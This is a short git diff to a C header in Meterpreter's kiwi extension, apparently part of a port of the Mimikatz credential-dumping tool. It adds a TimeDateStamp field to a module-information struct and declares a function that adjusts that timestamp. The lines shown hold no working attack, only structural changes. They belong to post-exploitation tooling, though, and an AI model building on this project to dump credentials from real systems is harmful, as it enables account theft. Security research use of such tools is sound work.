diff --git a/c/meterpreter/source/extensions/kiwi/modules/kull_m_process.h b/c/meterpreter/source/extensions/kiwi/modules/kull_m_process.h
index 1ee0ce37..3397cff1 100644
--- a/c/meterpreter/source/extensions/kiwi/modules/kull_m_process.h
+++ b/c/meterpreter/source/extensions/kiwi/modules/kull_m_process.h
@@ -324,6 +324,7 @@ VOID kull_m_process_initialise();
 typedef struct _KULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION{
 	KULL_M_MEMORY_ADDRESS DllBase;
 	ULONG SizeOfImage;
+	ULONG TimeDateStamp;
 	PCUNICODE_STRING NameDontUseOutsideCallback;
 } KULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION, *PKULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION;
 
@@ -346,6 +347,7 @@ BOOL kull_m_process_getProcessIdForName(LPCWSTR name, PDWORD processId);
 
 typedef BOOL (CALLBACK * PKULL_M_MODULE_ENUM_CALLBACK) (PKULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION pModuleInformation, PVOID pvArg);
 NTSTATUS kull_m_process_getVeryBasicModuleInformations(PKULL_M_MEMORY_HANDLE memory, PKULL_M_MODULE_ENUM_CALLBACK callBack, PVOID pvArg);
+void kull_m_process_adjustTimeDateStamp(PKULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION information);
 BOOL CALLBACK kull_m_process_callback_moduleForName(PKULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION pModuleInformation, PVOID pvArg);
 BOOL CALLBACK kull_m_process_callback_moduleFirst(PKULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION pModuleInformation, PVOID pvArg);
 BOOL kull_m_process_getVeryBasicModuleInformationsForName(PKULL_M_MEMORY_HANDLE memory, PCWSTR name, PKULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION informations);